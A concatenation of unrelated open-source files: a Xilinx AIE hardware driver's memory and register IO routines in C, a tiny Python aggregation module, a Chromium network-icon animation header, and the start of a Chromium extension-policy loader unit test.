__AIEBAREMTL__ /* Enable exception for baremetal, * Once baremetal has interrupt abstration * layer to enable/disable particular interrupt. * driver can enable/disable AIE interrupt. */ Xil_ExceptionEnable(); #else XAieIO_IntrEnable(); #endif } /*****************************************************************************/ /** * * This API disables AIE interrupt * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_InterruptDisable(void) { #ifdef __AIESIM__ return; #elif defined __AIEBAREMTL__ /* Disable exception for baremetal, * Once baremetal has interrupt abstration * layer to enable/disable particular interrupt. * driver can enable/disable AIE interrupt. */ Xil_ExceptionDisable(); #else XAieIO_IntrDisable(); #endif } /*****************************************************************************/ /** * * This API re-routes to platform print function * * @param format strings * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_IntPrint(const char *Format, ...) { #ifdef __AIESIM__ /* * If XAieSim_print() is used, the driver should be built with * XAIE_DEBUG. Use print directly instead. */ printf(Format); #elif defined __AIEBAREMTL__ xil_printf(Format); #else va_list argptr; va_start(argptr, Format); vprintf(Format, argptr); va_end(argptr); #endif } /*****************************************************************************/ /** * * This API set the log file * * @param File - path of the file for logging. * * @return XAIE_SUCCESS for success or XAIE_FAILURE for failure. * * @note If will be fail if the file is failed to open, or if there is * already logging file opened. * *******************************************************************************/ u32 XAieLib_OpenLogFile(const char *File) { #ifdef __linux__ if (XAieLib_LogFPtr != XAIE_NULL) { return XAIELIB_FAILURE; } if (File == XAIE_NULL) { return XAIELIB_FAILURE; } XAieLib_LogFPtr = fopen(File, "a"); if (XAieLib_LogFPtr == XAIE_NULL) { XAieLib_IntPrint("Failed to open log file %s, %s.\n", File, strerror(errno)); return XAIE_FAILURE; } return XAIELIB_SUCCESS; #else (void)File; return XAIELIB_FAILURE; #endif } /*****************************************************************************/ /** * * This API close the log file * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_CloseLogFile(void) { #ifdef __linux__ if (XAieLib_LogFPtr != XAIE_NULL) { fclose(XAieLib_LogFPtr); XAieLib_LogFPtr = XAIE_NULL; } #else #endif } /*****************************************************************************/ /** * * This API implements AIE logging * * @param Level - Log level * @param Format - format string * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_log(XAieLib_LogLevel Level, const char *Format, ...) { static const char *Level_Str[] = { "XAIE: INFO: ", "XAIE: ERROR: ", }; #ifdef __AIEBAREMTL__ va_list args; va_start(args, Format); printf("%s", Level_Str[Level]); vprintf(Format, args); va_end(args); #else /* __linux__ */ va_list args; FILE *FPtr; va_start(args, Format); if (XAieLib_LogFPtr == NULL) { if (Level == XAIELIB_LOGERROR) { FPtr = stderr; } else { FPtr = stdout; } } else { FPtr = XAieLib_LogFPtr; } fprintf(FPtr,"%s", Level_Str[Level]); vfprintf(FPtr, Format, args); va_end(args); if (XAieLib_LogFPtr != NULL) { fflush(FPtr); } #endif } /*****************************************************************************/ /** * * This is the memory function to initialize the platform specific memory * instance. * * @param idx: Index of the memory to initialize. * * @return Pointer to the initialized memory instance. Null or 0 if not * supported. * * @note None. * *******************************************************************************/ XAieLib_MemInst *XAieLib_MemInit(u8 idx) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ XAieLib_MemInst *XAieLib_MemInstPtr; XAieLib_MemInstPtr = malloc(sizeof(*XAieLib_MemInstPtr)); if (!XAieLib_MemInstPtr) return NULL; XAieLib_MemInstPtr->Vaddr = (u64)malloc(XAIELIB_BAREMTL_DEF_MEM_SIZE); if (!XAieLib_MemInstPtr->Vaddr) { free(XAieLib_MemInstPtr); return NULL; } XAieLib_MemInstPtr->Paddr = XAieLib_MemInstPtr->Vaddr; XAieLib_MemInstPtr->Size = XAIELIB_BAREMTL_DEF_MEM_SIZE; return XAieLib_MemInstPtr; #else return (XAieLib_MemInst *)XAieIO_MemInit(idx); #endif } /*****************************************************************************/ /** * * This is the memory function to free the platform specific memory instance * * @param XAieLib_MemInstPtr: Memory instance pointer. * * @return None. * * @note @IO_MemInstPtr is freed and invalid after this function. * *******************************************************************************/ void XAieLib_MemFinish(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ free((void *)XAieLib_MemInstPtr->Vaddr); free(XAieLib_MemInstPtr); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; XAieIO_MemFinish(MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to attach the external memory to device * * @param Vaddr: Vaddr of the memory * @param Paddr: Paddr of the memory * @param Size: Size of the memory * @param MemHandle: Handle of the memory. For linux, dmabuf fd * * @return Pointer to the attached memory instance. * * @note Some arguments are not required for some backend platforms. * This is determined by platform implementation. * *******************************************************************************/ XAieLib_MemInst *XAieLib_MemAttach(u64 Vaddr, u64 Paddr, u64 Size, u64 MemHandle) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ XAieLib_MemInst *XAieLib_MemInstPtr; XAieLib_MemInstPtr = malloc(sizeof(*XAieLib_MemInstPtr)); if (!XAieLib_MemInstPtr) return NULL; /* In baremetal, the handle doesn't exist */ XAieLib_MemInstPtr->Vaddr = Vaddr; XAieLib_MemInstPtr->Paddr = Paddr; XAieLib_MemInstPtr->Size = Size; return XAieLib_MemInstPtr; #else return (XAieLib_MemInst *)XAieIO_MemAttach(Vaddr, Paddr, Size, MemHandle); #endif } /*****************************************************************************/ /** * * This is the memory function to detach the memory from device * * @param XAieLib_MemInstPtr: Memory instance pointer. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_MemDetach(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ /* In baremetal expect the handle to be the paddr / vaddr */ free(XAieLib_MemInstPtr); #else XAieIO_MemDetach((XAieIO_Mem *)XAieLib_MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to allocate a memory * * @param Size: Size of the memory * @param Attr: Any of XAIELIB_MEM_ATTR_* * * @return Pointer to the allocated IO memory instance. * * @note None. * *******************************************************************************/ XAieLib_MemInst *XAieLib_MemAllocate(u64 Size, u32 Attr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ XAieLib_MemInst *XAieLib_MemInstPtr; XAieLib_MemInstPtr = malloc(sizeof(*XAieLib_MemInstPtr)); if (!XAieLib_MemInstPtr) return NULL; XAieLib_MemInstPtr->Vaddr = (u64)malloc(Size); XAieLib_MemInstPtr->Paddr = XAieLib_MemInstPtr->Vaddr; XAieLib_MemInstPtr->Size = Size; /* * 'Attr' is not handled at the moment. So it's always cached, and * the sync or accessor function takes care of it. */ return XAieLib_MemInstPtr; #else return (XAieLib_MemInst *)XAieIO_MemAllocate(Size, Attr); #endif } /*****************************************************************************/ /** * * This is the memory function to free the memory * * @param XAieLib_MemInstPtr: IO Memory instance pointer. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_MemFree(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ free((void *)XAieLib_MemInstPtr->Vaddr); free(XAieLib_MemInstPtr); #else XAieIO_MemFree((XAieIO_Mem *)XAieLib_MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to sync the memory for CPU * * @param XAieLib_MemInstPtr: IO Memory instance pointer. * * @return XAIELIB_SUCCESS if successful. * * @note None. * *******************************************************************************/ u8 XAieLib_MemSyncForCPU(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ Xil_DCacheInvalidateRange(XAieLib_MemInstPtr->Vaddr, XAieLib_MemInstPtr->Size); return 0; #else return XAieIO_MemSyncForCPU((XAieIO_Mem *)XAieLib_MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to sync the memory for device * * @param XAieLib_MemInstPtr: IO Memory instance pointer. * * @return XAIELIB_SUCCESS if successful. * * @note None. * *******************************************************************************/ u8 XAieLib_MemSyncForDev(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ Xil_DCacheFlushRange(XAieLib_MemInstPtr->Vaddr, XAieLib_MemInstPtr->Size); return 0; #else return XAieIO_MemSyncForDev((XAieIO_Mem *)XAieLib_MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to return the size of the memory instance * * @param XAieLib_MemInstPtr: Memory instance pointer. * * @return size of the memory instance. 0 if not supported. * * @note None. * *******************************************************************************/ u64 XAieLib_MemGetSize(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ return XAieLib_MemInstPtr->Size - ((u64)XAieLib_MemInstPtr->Vaddr % XAIELIB_SHIM_MEM_ALIGN); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; return XAieIO_MemGetSize(MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to return the virtual address of * the memory instance * * @param XAieLib_MemInstPtr: Memory instance pointer. * * @return Mapped virtual address of the memory instance. * 0 if not supported. * * @note None. * *******************************************************************************/ u64 XAieLib_MemGetVaddr(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ return ((u64)XAieLib_MemInstPtr->Vaddr + XAIELIB_SHIM_MEM_ALIGN - 1) & ~(XAIELIB_SHIM_MEM_ALIGN - 1); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; return XAieIO_MemGetVaddr(MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to return the virtual address of * the memory instance * * @param XAieLib_MemInstPtr: Memory instance pointer. * * @return Physical address of the memory instance. 0 if not supported. * * @note None. * *******************************************************************************/ u64 XAieLib_MemGetPaddr(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ return ((u64)XAieLib_MemInstPtr->Vaddr + XAIELIB_SHIM_MEM_ALIGN - 1) & ~(XAIELIB_SHIM_MEM_ALIGN - 1); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; return XAieIO_MemGetPaddr(MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to write to the physical address. * * @param XAieLib_MemInstPtr: Memory instance pointer. * @param Addr: Absolute physical address to write. * @param Data: A 32 bit data to write. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_MemWrite32(XAieLib_MemInst *XAieLib_MemInstPtr, u64 Addr, u32 Data) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ Xil_Out32(Addr, Data); Xil_DCacheFlushRange(Addr, 4); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; XAieIO_MemWrite32(MemInstPtr, Addr, Data); #endif } /*****************************************************************************/ /** * * This is the memory function to read from the physical address. * * @param XAieLib_MemInstPtr: Memory instance pointer. * @param Addr: Absolute physical address to write. * * @return A read 32 bit data. 0 if not supported. * * @note None. * *******************************************************************************/ u32 XAieLib_MemRead32(XAieLib_MemInst *XAieLib_MemInstPtr, u64 Addr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ Xil_DCacheInvalidateRange(Addr, 4); return Xil_In32(Addr); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; return XAieIO_MemRead32(MemInstPtr, Addr); #endif } /*****************************************************************************/ /** * * This is the memory IO function to read 32bit data from the specified address. * * @param Addr: Address to read from. * * @return 32-bit read value. * * @note None. * *******************************************************************************/ u32 XAieLib_Read32(u64 Addr) { #ifdef __AIESIM__ return(XAieSim_Read32(Addr)); #elif defined __AIEBAREMTL__ return(Xil_In32(Addr)); #else return(XAieIO_Read32(Addr)); #endif } /*****************************************************************************/ /** * * This is the memory IO function to read 128b data from the specified address. * * @param Addr: Address to read from. * @param Data: Pointer to the 128-bit buffer to store the read data. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_Read128(u64 Addr, u32 *Data) { u8 Idx; for(Idx = 0U; Idx < 4U; Idx++) { #ifdef __AIESIM__ Data[Idx] = XAieSim_Read32(Addr + Idx*4U); #elif defined __AIEBAREMTL__ Data[Idx] = Xil_In32(Addr + Idx*4U); #else Data[Idx] = XAieIO_Read32(Addr + Idx*4U); #endif } } /*****************************************************************************/ /** * * This is the memory IO function to write 32bit data to the specified address. * * @param Addr: Address to write to. * @param Data: 32-bit data to be written. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_Write32(u64 Addr, u32 Data) { #ifdef __AIESIM__ XAieSim_Write32(Addr, Data); #elif defined __AIEBAREMTL__ Xil_Out32(Addr, Data); #else XAieIO_Write32(Addr, Data); #endif } /*****************************************************************************/ /** * * This is the memory IO function to write a masked 32bit data to * the specified address. * * @param Addr: Address to write to. * @param Mask: Mask to be applied to Data. * @param Data: 32-bit data to be written. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_MaskWrite32(u64 Addr, u32 Mask, u32 Data) { u32 RegVal; #ifdef __AIESIM__ XAieSim_MaskWrite32(Addr, Mask, Data); #elif defined __AIEBAREMTL__ RegVal = Xil_In32(Addr); RegVal &= ~Mask; RegVal |= Data; Xil_Out32(Addr, RegVal); #else RegVal = XAieIO_Read32(Addr); RegVal &= ~Mask; RegVal |= Data; XAieIO_Write32(Addr, RegVal); #endif } /*****************************************************************************/ /** * * This is the memory IO function to write 128bit data to the specified address. * * @param Addr: Address to write to. * @param Data: Pointer to the 128-bit data buffer. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_Write128(u64 Addr, u32 *Data) { #ifdef __AIESIM__ XAieSim_Write128(Addr, Data); #elif defined __AIEBAREMTL__ u8 Idx; for(Idx = 0U; Idx < 4U; Idx++) { Xil_Out32((u32)Addr + Idx * 4U, Data[Idx]); } #else XAieIO_Write128(Addr, Data); #endif } /*****************************************************************************/ /** * * This is the memory IO function to write 128bit data to the specified address. * * @param Addr: Address to write to. * @param Data: Pointer to the 128-bit data buffer. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_WriteCmd(u8 Command, u8 ColId, u8 RowId, u32 CmdWd0, u32 CmdWd1, u8 *CmdStr) { #ifdef __AIESIM__ XAieSim_WriteCmd(Command, ColId, RowId, CmdWd0, CmdWd1, CmdStr); #elif defined __AIEBAREMTL__ #endif } /*****************************************************************************/ /** * * This is the IO function to poll until the value at the address to be given * masked value. * * @param Addr: Address to write to. * @param Mask: Mask to be applied to read data. * @param Value: The expected value * @param TimeOutUs: Minimum timeout in usec. * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE * * @note None. * *******************************************************************************/ u32 XAieLib_MaskPoll(u64 Addr, u32 Mask, u32 Value, u32 TimeOutUs) { u32 Ret = XAIELIB_FAILURE; #ifdef __AIESIM__ if (XAieSim_MaskPoll(Addr, Mask, Value, TimeOutUs) == XAIESIM_SUCCESS) { Ret = XAIELIB_SUCCESS; } #else u32 Count, MinTimeOutUs; /* * Any value less than 200 us becomes noticable overhead. This is based * on some profiling, and it may vary between platforms. */ MinTimeOutUs = 200; Count = ((u64)TimeOutUs + MinTimeOutUs - 1) / MinTimeOutUs; while (Count > 0U) { if ((XAieLib_Read32(Addr) & Mask) == Value) { Ret = XAIELIB_SUCCESS; break; } XAieLib_usleep(MinTimeOutUs); Count--; } /* Check for the break from timed-out loop */ if ((Ret == XAIELIB_FAILURE) && ((XAieLib_Read32(Addr) & Mask) == Value)) { Ret = XAIELIB_SUCCESS; } #endif return Ret; } /*****************************************************************************/ /** * * This is the NPI IO function to read 32bit data from the specified address. * * @param Addr: Address to read from. * * @return 32-bit read value. * * @note This only work if NPI is accessble. * *******************************************************************************/ u32 XAieLib_NPIRead32(u64 Addr) { #ifdef __AIESIM__ return XAieSim_NPIRead32(Addr); #elif defined __AIEBAREMTL__ return Xil_In32(Addr); #else return XAieIO_NPIRead32(Addr); #endif } /*****************************************************************************/ /** * * This is the internal NPI function to set the lock of AIE NPI space * * @param Lock: non 0 for lock, 0 for unlock * * @note Used only in this file. * This only work if NPI is accessble. * *******************************************************************************/ static void XAieLib_NPISetLock(u8 Lock) { u32 RegAddr, RegVal; RegAddr = XAIE_NPI_PCSR_LOCK; if (Lock == 0) { RegVal = XAIE_NPI_PCSR_LOCK_STATE_UNLOCK_CODE << XAIE_NPI_PCSR_LOCK_STATE_LSB; } else { RegVal = XAIE_NPI_PCSR_LOCK_STATE_LOCK_CODE << XAIE_NPI_PCSR_LOCK_STATE_LSB; } #ifdef __AIESIM__ XAieSim_NPIWrite32(RegAddr, RegVal); #elif defined __AIEBAREMTL__ Xil_Out32(RegAddr, RegVal); #else XAieIO_NPIWrite32(RegAddr, RegVal); #endif } /*****************************************************************************/ /** * * This is the NPI IO function to write 32bit data to the specified address. * * @param Addr: Address to write to. * @param Data: 32-bit data to be written. * * @return None. * * @note This only work if NPI is accessble. * *******************************************************************************/ void XAieLib_NPIWrite32(u64 Addr, u32 Data) { XAieLib_NPISetLock(0); #ifdef __AIESIM__ XAieSim_NPIWrite32(Addr, Data); #elif defined __AIEBAREMTL__ Xil_Out32(Addr, Data); #else XAieIO_NPIWrite32(Addr, Data); #endif XAieLib_NPISetLock(1); } /*****************************************************************************/ /** * * This is the NPI IO function to write a masked 32bit data to * the specified address. * * @param Addr: Address to write to. * @param Mask: Mask to be applied to Data. * @param Data: 32-bit data to be written. * * @return None. * * @note This only work if NPI is accessble. * *******************************************************************************/ void XAieLib_NPIMaskWrite32(u64 Addr, u32 Mask, u32 Data) { u32 RegVal; XAieLib_NPISetLock(0); #ifdef __AIESIM__ XAieSim_NPIMaskWrite32(Addr, Mask, Data); #elif defined __AIEBAREMTL__ RegVal = Xil_In32(Addr); RegVal &= ~Mask; RegVal |= Data; Xil_Out32(Addr, RegVal); #else RegVal = XAieIO_NPIRead32(Addr); RegVal &= ~Mask; RegVal |= Data; XAieIO_NPIWrite32(Addr, RegVal); #endif XAieLib_NPISetLock(1); } /*****************************************************************************/ /** * * This is the NPI IO function to poll until the value at the address to be given * masked value. * * @param Addr: Address to write to. * @param Mask: Mask to be applied to read data. * @param Value: The expected value * @param TimeOutUs: Minimum timeout in usec. * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE * * @note This only work if NPI is accessble. * *******************************************************************************/ u32 XAieLib_NPIMaskPoll(u64 Addr, u32 Mask, u32 Value, u32 TimeOutUs) { u32 Ret = XAIELIB_FAILURE; #ifdef __AIESIM__ if (XAieSim_NPIMaskPoll(Addr, Mask, Value, TimeOutUs) == XAIESIM_SUCCESS) { Ret = XAIELIB_SUCCESS; } #else u32 Count, MinTimeOutUs; /* * Any value less than 200 us becomes noticable overhead. This is based * on some profiling, and it may vary between platforms. */ MinTimeOutUs = 200; Count = ((u64)TimeOutUs + MinTimeOutUs - 1) / MinTimeOutUs; while (Count > 0U) { if ((XAieLib_NPIRead32(Addr) & Mask) == Value) { Ret = XAIELIB_SUCCESS; break; } XAieLib_usleep(MinTimeOutUs); Count--; } /* Check for the break from timed-out loop */ if ((Ret == XAIELIB_FAILURE) && ((XAieLib_NPIRead32(Addr) & Mask) == Value)) { Ret = XAIELIB_SUCCESS; } #endif return Ret; } /** @} */
11,055
486
# Copyright (c) 2018 Uber Technologies, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from functools import reduce from operator import mul def sum_aggregation(inputs): return sum(inputs) def prod_aggregation(inputs): return reduce(mul, inputs, 1) str_to_aggregation = { 'sum': sum_aggregation, 'prod': prod_aggregation, }
270
14,668
<filename>ash/system/network/network_icon_animation.h // Copyright (c) 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef ASH_SYSTEM_NETWORK_NETWORK_ICON_ANIMATION_H_ #define ASH_SYSTEM_NETWORK_NETWORK_ICON_ANIMATION_H_ #include "ash/ash_export.h" #include "base/observer_list.h" #include "ui/gfx/animation/animation_delegate.h" #include "ui/gfx/animation/throb_animation.h" namespace ash { namespace network_icon { class AnimationObserver; // Single instance class to handle icon animations and keep them in sync. class ASH_EXPORT NetworkIconAnimation : public gfx::AnimationDelegate { public: NetworkIconAnimation(); ~NetworkIconAnimation() override; // Returns the current animation value, [0-1]. double GetAnimation(); // The animation stops when all observers have been removed. // Be sure to remove observers when no associated icons are animating. void AddObserver(AnimationObserver* observer); void RemoveObserver(AnimationObserver* observer); // gfx::AnimationDelegate implementation. void AnimationProgressed(const gfx::Animation* animation) override; static NetworkIconAnimation* GetInstance(); private: gfx::ThrobAnimation animation_; base::ObserverList<AnimationObserver>::Unchecked observers_; }; } // namespace network_icon } // namespace ash #endif // ASH_SYSTEM_NETWORK_NETWORK_ICON_ANIMATION_H_
442
575
<reponame>iridium-browser/iridium-browser<filename>chrome/browser/chromeos/extensions/device_local_account_external_policy_loader_unittest.cc // Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "chrome/browser/chromeos/extensions/device_local_account_external_policy_loader.h" #include <string> #include <utility> #include "base/bind.h" #include "base/callback.h" #include "base/files/file_util.h" #include "base/files/scoped_temp_dir.h" #include "base/macros.h" #include "base/path_service.h" #include "base/run_loop.h" #include "base/single_thread_task_runner.h" #include "base/strings/stringprintf.h" #include "base/task/current_thread.h" #include "base/threading/thread_task_runner_handle.h" #include "base/values.h" #include "base/version.h" #include "build/build_config.h" #include "build/chromeos_buildflags.h" #include "chrome/browser/extensions/external_provider_impl.h" #include "chrome/common/chrome_paths.h" #include "chrome/test/base/testing_browser_process.h" #include "chrome/test/base/testing_profile.h" #include "components/policy/core/common/cloud/mock_cloud_policy_store.h" #include "components/policy/core/common/policy_map.h" #include "components/policy/core/common/policy_types.h" #include "components/policy/policy_constants.h" #include "content/public/browser/notification_service.h" #include "content/public/browser/notification_source.h" #include "content/public/test/browser_task_environment.h" #include "content/public/test/test_utils.h" #include "extensions/browser/external_install_info.h" #include "extensions/browser/external_provider_interface.h" #include "extensions/browser/notification_types.h" #include "extensions/browser/updater/extension_downloader.h" #include "extensions/common/extension.h" #include "extensions/common/extension_urls.h" #include "extensions/common/manifest.h" #include "services/data_decoder/public/cpp/test_support/in_process_data_decoder.h" #include "services/network/public/cpp/weak_wrapper_shared_url_loader_factory.h" #include "services/network/test/test_url_loader_factory.h" #include "testing/gmock/include/gmock/gmock.h" #include "testing/gtest/include/gtest/gtest.h" #include "url/gurl.h" #if BUILDFLAG(IS_CHROMEOS_ASH) #include "chrome/browser/ash/settings/scoped_cros_settings_test_helper.h" #endif // BUILDFLAG(IS_CHROMEOS_ASH) using extensions::ExternalInstallInfoFile; using extensions::ExternalInstallInfoUpdateUrl; using extensions::mojom::ManifestLocation; using ::testing::_; using ::testing::Field; using ::testing::InvokeWithoutArgs; using ::testing::Mock; using ::testing::StrEq; namespace chromeos { namespace { const char kCacheDir[] = "cache"; const char kExtensionId[] = "ldnnhddmnhbkjipkidpdiheffobcpfmf"; const char kExtensionUpdateManifest[] = "extensions/good_v1_update_manifest.xml"; const char kExtensionCRXVersion[] = "1.0.0.0"; class MockExternalPolicyProviderVisitor : public extensions::ExternalProviderInterface::VisitorInterface { public: MockExternalPolicyProviderVisitor(); virtual ~MockExternalPolicyProviderVisitor(); MOCK_METHOD1(OnExternalExtensionFileFound, bool(const ExternalInstallInfoFile&)); MOCK_METHOD2(OnExternalExtensionUpdateUrlFound, bool(const ExternalInstallInfoUpdateUrl&, bool)); MOCK_METHOD1(OnExternalProviderReady, void(const extensions::ExternalProviderInterface* provider)); MOCK_METHOD4(OnExternalProviderUpdateComplete, void(const extensions::ExternalProviderInterface*, const std::vector<ExternalInstallInfoUpdateUrl>&, const std::vector<ExternalInstallInfoFile>&, const std::set<std::string>& removed_extensions)); private: DISALLOW_COPY_AND_ASSIGN(MockExternalPolicyProviderVisitor); }; MockExternalPolicyProviderVisitor::MockExternalPolicyProviderVisitor() { } MockExternalPolicyProviderVisitor::~MockExternalPolicyProviderVisitor() { } // A simple wrapper around a SingleThreadTaskRunner. When a task is posted // through it, increments a counter which is decremented when the task is run. class TrackingProxyTaskRunner : public base::SingleThreadTaskRunner { public: TrackingProxyTaskRunner( scoped_refptr<base::SingleThreadTaskRunner> task_runner) : wrapped_task_runner_(std::move(task_runner)) {} bool PostDelayedTask(const base::Location& from_here, base::OnceClosure task, base::TimeDelta delay) override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); ++pending_task_count_; return wrapped_task_runner_->PostDelayedTask( from_here, base::BindOnce(&TrackingProxyTaskRunner::RunTask, this, std::move(task)), delay); } bool PostNonNestableDelayedTask(const base::Location& from_here, base::OnceClosure task, base::TimeDelta delay) override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); ++pending_task_count_; return wrapped_task_runner_->PostNonNestableDelayedTask( from_here, base::BindOnce(&TrackingProxyTaskRunner::RunTask, this, std::move(task)), delay); } bool RunsTasksInCurrentSequence() const override { return wrapped_task_runner_->RunsTasksInCurrentSequence(); } bool has_pending_tasks() const { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); return pending_task_count_ != 0; } private: ~TrackingProxyTaskRunner() override = default; void RunTask(base::OnceClosure task) { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); DCHECK_GT(pending_task_count_, 0); --pending_task_count_; std::move(task).Run(); } scoped_refptr<base::SingleThreadTaskRunner> wrapped_task_runner_; SEQUENCE_CHECKER(sequence_checker_); int pending_task_count_ = 0; }; } // namespace class DeviceLocalAccountExternalPolicyLoaderTest : public testing::Test { protected: DeviceLocalAccountExternalPolicyLoaderTest(); ~DeviceLocalAccountExternalPolicyLoaderTest() override; void SetUp() override; void TearDown() override; void VerifyAndResetVisitorCallExpectations(); void SetForceInstallListPolicy(); content::BrowserTaskEnvironment task_environment_; data_decoder::test::InProcessDataDecoder in_process_data_decoder_; std::unique_ptr<TestingProfile> profile_; base::ScopedTempDir temp_dir_; base::FilePath cache_dir_; policy::MockCloudPolicyStore store_; network::TestURLLoaderFactory test_url_loader_factory_; scoped_refptr<network::WeakWrapperSharedURLLoaderFactory> test_shared_loader_factory_; base::FilePath test_dir_; scoped_refptr<DeviceLocalAccountExternalPolicyLoader> loader_; MockExternalPolicyProviderVisitor visitor_; std::unique_ptr<extensions::ExternalProviderImpl> provider_; content::InProcessUtilityThreadHelper in_process_utility_thread_helper_; #if BUILDFLAG(IS_CHROMEOS_ASH) ash::ScopedCrosSettingsTestHelper cros_settings_test_helper_; #endif // BUILDFLAG(IS_CHROMEOS_ASH) }; DeviceLocalAccountExternalPolicyLoaderTest:: DeviceLocalAccountExternalPolicyLoaderTest() : task_environment_(content::BrowserTaskEnvironment::IO_MAINLOOP), test_shared_loader_factory_( base::MakeRefCounted<network::WeakWrapperSharedURLLoaderFactory>( &test_url_loader_factory_)) {} DeviceLocalAccountExternalPolicyLoaderTest:: ~DeviceLocalAccountExternalPolicyLoaderTest() { } void DeviceLocalAccountExternalPolicyLoaderTest::SetUp() { profile_ = std::make_unique<TestingProfile>(); ASSERT_TRUE(temp_dir_.CreateUniqueTempDir()); cache_dir_ = temp_dir_.GetPath().Append(kCacheDir); ASSERT_TRUE(base::CreateDirectoryAndGetError(cache_dir_, NULL)); TestingBrowserProcess::GetGlobal()->SetSharedURLLoaderFactory( test_shared_loader_factory_); ASSERT_TRUE(base::PathService::Get(chrome::DIR_TEST_DATA, &test_dir_)); loader_ = new DeviceLocalAccountExternalPolicyLoader(&store_, cache_dir_); provider_.reset(new extensions::ExternalProviderImpl( &visitor_, loader_, profile_.get(), ManifestLocation::kExternalPolicy, ManifestLocation::kExternalPolicyDownload, extensions::Extension::NO_FLAGS)); VerifyAndResetVisitorCallExpectations(); } void DeviceLocalAccountExternalPolicyLoaderTest::TearDown() { TestingBrowserProcess::GetGlobal()->SetSharedURLLoaderFactory(nullptr); } void DeviceLocalAccountExternalPolicyLoaderTest:: VerifyAndResetVisitorCallExpectations() { Mock::VerifyAndClearExpectations(&visitor_); EXPECT_CALL(visitor_, OnExternalExtensionFileFound(_)).Times(0); EXPECT_CALL(visitor_, OnExternalExtensionUpdateUrlFound(_, _)).Times(0); EXPECT_CALL(visitor_, OnExternalProviderReady(_)) .Times(0); EXPECT_CALL(visitor_, OnExternalProviderUpdateComplete(_, _, _, _)).Times(0); } void DeviceLocalAccountExternalPolicyLoaderTest::SetForceInstallListPolicy() { base::Value forcelist(base::Value::Type::LIST); forcelist.Append("invalid"); forcelist.Append(base::StringPrintf( "%s;%s", kExtensionId, extension_urls::GetWebstoreUpdateUrl().spec().c_str())); store_.policy_map_.Set(policy::key::kExtensionInstallForcelist, policy::POLICY_LEVEL_MANDATORY, policy::POLICY_SCOPE_USER, policy::POLICY_SOURCE_CLOUD, std::move(forcelist), nullptr); store_.NotifyStoreLoaded(); } // Verifies that when the cache is not explicitly started, the loader does not // serve any extensions, even if the force-install list policy is set or a load // is manually requested. TEST_F(DeviceLocalAccountExternalPolicyLoaderTest, CacheNotStarted) { // Set the force-install list policy. SetForceInstallListPolicy(); // Manually request a load. loader_->StartLoading(); EXPECT_FALSE(loader_->IsCacheRunning()); } // Verifies that the cache can be started and stopped correctly. TEST_F(DeviceLocalAccountExternalPolicyLoaderTest, ForceInstallListEmpty) { // Set an empty force-install list policy. store_.NotifyStoreLoaded(); // Start the cache. Verify that the loader announces an empty extension list. EXPECT_CALL(visitor_, 